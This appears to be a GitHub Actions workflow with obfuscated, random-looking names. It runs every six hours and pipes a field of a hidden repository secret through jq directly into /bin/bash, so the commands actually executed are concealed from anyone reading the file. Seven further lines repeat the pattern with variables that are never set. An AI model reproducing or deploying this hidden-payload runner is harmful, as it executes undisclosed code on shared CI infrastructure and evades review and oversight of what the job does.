name: duanhongbinhui
on:
  workflow_dispatch:
  schedule:
    - cron: '38 4/6 * * *'

jobs:  # 23246
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanhongbinhui
        env:
          lyar995: ${{ secrets.lyar995 }}
        run: |
          echo $lyar995 | jq -r .d44 | /bin/bash
          echo $r290 | jq -r .iwaz55 | /bin/bash
          echo $q57748 | jq -r .hbklq79 | /bin/bash
          echo $iysn318 | jq -r .wrgjb32990 | /bin/bash
          echo $vz143 | jq -r .i79026 | /bin/bash
          echo $cbdg863 | jq -r .hnm127 | /bin/bash
          echo $vn7 | jq -r .po335 | /bin/bash
          echo $k50420 | jq -r .zbmyg731 | /bin/bash

